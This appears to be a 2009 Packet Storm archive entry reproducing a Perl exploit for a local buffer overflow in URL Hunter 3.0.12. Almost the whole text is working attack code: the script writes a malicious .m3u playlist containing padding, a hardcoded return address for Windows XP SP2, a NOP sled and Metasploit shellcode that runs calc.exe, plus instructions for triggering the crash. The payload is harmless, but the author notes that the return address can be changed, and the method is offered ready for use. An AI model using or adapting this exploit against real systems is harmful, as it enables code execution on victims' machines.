URL Hunter 3.0.12 Buffer Overflow

2009-08-28T00:00:00
ID PACKETSTORM:80775
Type packetstorm
Reporter Inj3ct0r
Modified 2009-08-28T00:00:00

Description

                                        
                                            `=============================================================  
URL Hunter Version 3.0.12(.M3u) Local Buffer Overflow Exploit   
=============================================================  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0   
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 0  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1  
  
#[+] Discovered By : Inj3ct0r  
#[+] Site : Inj3ct0r.com  
#[+] Support e-mail : submit[at]inj3ct0r.com  
#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net  
  
  
#!/usr/bin/perl  
#URL Hunter Version 3.0.12(.M3u) Local Buffer Overflow Exploit  
#download : http://www.rm-to-mp3.net/downloads/urlhuntersetup.exe  
  
my $crash= "A" x 26039;  
  
#created by opt!x hacker  
  
####run software clic on stop to be start and get m3u file into the sof and  
boom calc executed####  
#you can change the ret adress as you need  
#this exploit work wit me without any header  
  
# shellcode executes calc.exe from metasploit project Size=160 --  
Encoder=PexFnstenvSub  
my $shellcode=  
  
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".  
  
"\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".  
  
"\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".  
  
"\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".  
  
"\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".  
  
"\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".  
  
"\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".  
  
"\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".  
  
"\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".  
  
"\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";  
  
  
my $ret = "\x68\xD5\x85\x7C"; # 0x7C85D568 call esp from kernel32.dll  
in windows xp pro SP2 fr  
my $nop = "\x90" x 10;  
open(m3u,">>youssef.m3u");  
  
print m3u $crash.$ret.$nop.$shellcode;  
print "[+] Done !! [+]";  
close(m3u);  
  
---------------------------------  
  
ThE End =] Visit my proj3ct :  
  
http://inj3ct0r.com  
http://inj3ct0r.org  
http://inj3ct0r.net  
  
  
# ~ - [ [ : Inj3ct0r : ] ]`